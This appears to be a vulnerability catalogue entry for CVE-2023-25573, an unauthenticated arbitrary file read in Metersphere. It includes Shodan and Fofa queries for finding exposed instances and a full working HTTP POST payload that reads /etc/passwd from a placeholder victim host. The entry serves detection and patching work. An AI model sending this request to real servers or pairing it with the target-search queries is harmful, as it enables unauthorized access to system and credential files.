| Title | Metersphere - Arbitrary File Read |
|---|---|
| Author | DhiyaneshDK |
| Severity | High |
| Impact | This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data. |
| Remediation | Users are advised to upgrade. There are no known workarounds for this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.93455 |
| CVE ID | CVE-2023-25573 |
| CWE ID | CWE-862 |
| Shodan Query | http.html:"metersphere" |
| Fofa Query | body="Metersphere"body="metersphere"title="metersphere" |
| Tags | cve cve2023 metersphere lfi vkev vuln |
Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in /api/jmeter/download/files, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1
POST /api/jmeter/download/files HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1
Connection: close
Content-Length: 67
Content-Type: application/json
Accept-Encoding: gzip
{"reportId":"yyEo","bodyFiles":[{"id":"FCV","name":"/etc/passwd"}]}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-25573.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-25573.pcap
N/AN/A